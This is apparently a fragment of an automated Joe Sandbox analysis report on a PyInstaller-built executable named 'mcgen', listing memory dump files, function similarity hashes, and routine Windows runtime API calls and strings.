                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                    • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                    • Instruction ID: 4818a11069977892d93c0860187c08e32967ebcd252d8462a3469528ffc5afd7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3114F62E5CA1381F674193CD45637A204CEF59376E248634EBBE876DBCE2CA9C54206
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF6B9F2A613,?,?,00000000,00007FF6B9F2A8AE,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2B41F
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF6B9F2A613,?,?,00000000,00007FF6B9F2A8AE,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2B43E
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF6B9F2A613,?,?,00000000,00007FF6B9F2A8AE,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2B466
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF6B9F2A613,?,?,00000000,00007FF6B9F2A8AE,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2B477
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF6B9F2A613,?,?,00000000,00007FF6B9F2A8AE,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2B488
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                    • Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                                                    • Instruction ID: 09851dd021e5df2ec27820b45a913893f70adacd54c2a0fef5b41d4a20dbb1e8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9114720A1C68241FA589F399691279714A9F857F2F688238FE3DCB6D6DE3CA4018700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                    • Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                                                    • Instruction ID: 9d5508a47c5fff09b3fb3bc3a33e8ce37f03918262f81bc0e5bd34078010a21e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2711F560E1928641FA58AA7D551177A314A8F463B3F644738FB3ECB2D2DD3CB8018301
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: verbose
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                                    • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                    • Instruction ID: 676f5fdc01aff1c2c648fd138c390e60bf20bae435dd7c3ca5caf5b2602e8c8d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C091CE32A09A8681FB618EA9D45037D3799AB44FA6F544137EB4EC73D5DF3CE8058301
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                    • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                                    • Instruction ID: 752b652766ca628cf55fc8c209de54addd5a412e2ec68e6e4140d6756caed6df
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8081D2B2D2868286F7654F2D811037837A8EB15776FB54134FB09DB299CF3DE9018701
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                    • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                                    • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                                    • Instruction ID: e24bdb4fe795ed19dac7d5be659a8ac28352457529105e15bf503db86026846f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B51C272B196328ADB14DF19E044A3833A9EB45BBAF108135DB5E87784DF3CE851C750
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                    • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                                    • Instruction ID: 9d423c6776c675cefd76ad71c53aa17281c2997cd3c102dcb903704983670cc2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5651B4B290837286EB648F29D04436877A8FB56BA6F244235DB4DC7795CF3CE851C781
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                                    • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                    • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                                    • Instruction ID: 0269334c8181439545edc37539dc67dbe6629749087c757f0e0f2d2ff981348c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB61C372908BE581E724CF19E4403AAB7A4FB86BE5F144225EB8C57B99CF7CD590CB40
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,?,00007FF6B9F1352C,?,00000000,00007FF6B9F13F23), ref: 00007FF6B9F17F22
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateDirectory
                                                                                                                                                                                                                                                                    • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                                    • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                                    • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                                                    • Instruction ID: a8324cd0e0548c2e6b74b91b8579d47fabab963f189ee1f4fd30827c9273d705
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D31C3A1619AE145EB218F29A4503EA639CEB95BF1F040231EB6D87BD9DF2CD6418780
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                                    • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                    • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                                    • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                                    • Instruction ID: 2fd1ce9a36ea350c97d4939d8841495dd57c66f93e131115a6aebf42dc828c11
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5219F62B08B9182E7209F69F4447EA73A8EB887D5F404136EB8D93655DF3CD255C740
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                                    • Instruction ID: 50feccd6c05a4dda130df4aad892f7eb55500bac582b6a517a05cae281b17841
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDD11172B18A818AE710CF79D4402AC37B9FB457E9B048276EF5E97B99DE38D016C740
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4170891091-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                                    • Instruction ID: 5834c40d2647249fc6be9b9000b3b76786558968647ce732260587ffcff6f366
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9951F7B2F1815286EB24CF2899517BC3769AB4437AF614135EF1ED3AE5DF3CA4018700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2780335769-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                                                    • Instruction ID: 3d35e242d57b329af3b75996e29cd07e78d9e1602afcd05e9f976d1c5575697c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65518B22E186818AFB10DFB9D4503BD33A9BB48BAAF148435EF4D9B689DF3CD4458701
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1956198572-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                    • Instruction ID: 144a1e1054ebc6512705b1cdb37674be7e47d73d170723f9825057f001374756
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D112961B0C16282FA588FBEE5442F91255EB857E2F548030DB4943B99CD2DD4C08244
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
